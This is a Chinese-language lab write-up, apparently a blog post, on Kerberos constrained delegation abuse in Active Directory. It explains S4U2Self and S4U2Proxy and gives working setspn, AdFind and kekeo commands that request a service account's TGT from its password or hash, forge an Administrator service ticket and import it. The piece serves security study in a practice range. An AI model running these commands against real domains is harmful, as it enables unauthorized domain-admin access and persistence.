文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
委派攻击之约束委派
由于非约束委派的不安全性,引入了约束委派,对kerberos协议进行了扩展,加入S4U,其中S4U支持两个子协议:Service for User to Self ( S4U2Self )和 Service for User to Proxy ( S4U2proxy ),这两个扩展都允许服务代表用户从KDC请求票证。 S4U2self可以代表自身请求针对其自身的可转发的Kerberos服务票据(ST1) ; S4U2proxy可以以用户的名义请求其它服务的ST2 ,约束委派就是限制了S4U2proxy扩展的范围。
大致流程:
user访问serviceA,向DC发起kerberos认证,域控返回user的TGT和ST1票据,user使用ST1票据对serviceA进行访问;
如果配置了serviceA到serviceB的约束委派,则serviceA能使用S4U2Proxy协议将用户发给自己的可转发的ST1票据以用户的身份发给DC;DC返回serviceA一个用来访问serviceB的ST2票据,这样serviceA就能以用户的身份对serviceB发起访问。
攻击原理:
由于服务用户只能获取某个用户(或主机)的服务的ST1而非TGT , 所以只能模拟用户访问特定的服务 ;但是如果能够拿到约束委派用户(或主机)的明文密码或hash,那么就可以伪造S4U的请求,伪装成服务用户以任意用户的权限申请访问指定服务的ST2。
漏洞复现:
setspn -A cifs/12server3.redteam.club websec #将websec用户加上spn标识变成服务用户
添加一个用户,加上spn标识变成服务用户,给予约束委派权限:
约束用户 有TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION 关键字段
使用AdFind工具使用命令查询存在的约束账户:
AdFind.exe -b "DC=redteam,DC=club" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
使用kekeo请求服务用户的TGT:(这一步需要知晓账户的明文密码或hash)
tgt::ask /user:websec /domain:redteam.club /password:pass@123 /ticket:test.kirbi #使用明文密码请求
tgt::ask /user:websec /domain:redteam.club /NTLM:XXXXX #使用hash请求
利用这个票据通过伪造S4U请求以administrator身份访问websec的ST:
tgs::s4u /tgt:TGT_websec@REDTEAM.CLUB_krbtgt~redteam.club@REDTEAM.CLUB.kirbi /user:Administrator@redteam.club /service:cifs/ad1.redteam.club
这时候kekeo当前路径下会出现administrator的ticket (用于访问websec的CIFS服务),将这个凭证导入访问websec的cifs服务:
keberos::ptt 凭证 #导入凭证
简单个人总结:
- 当我们查询到约束委派的用户时,并知晓它的明文密码或NTLM hash,才能利用工具请求它的TGT;
- 然后利用这个TGT,伪造S4U请求以administrator身份去访问这个服务账号的ST;
- 这里可以生成任意权限身份的ticket,我们是以administrator身份去访问的,所以生成的就是administrator的ticket,这个就是ST2;最后使用工具导入这个ST2,那我们就能够成功访问域控;通常约束委派多数用于用户权限维持。
3997
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
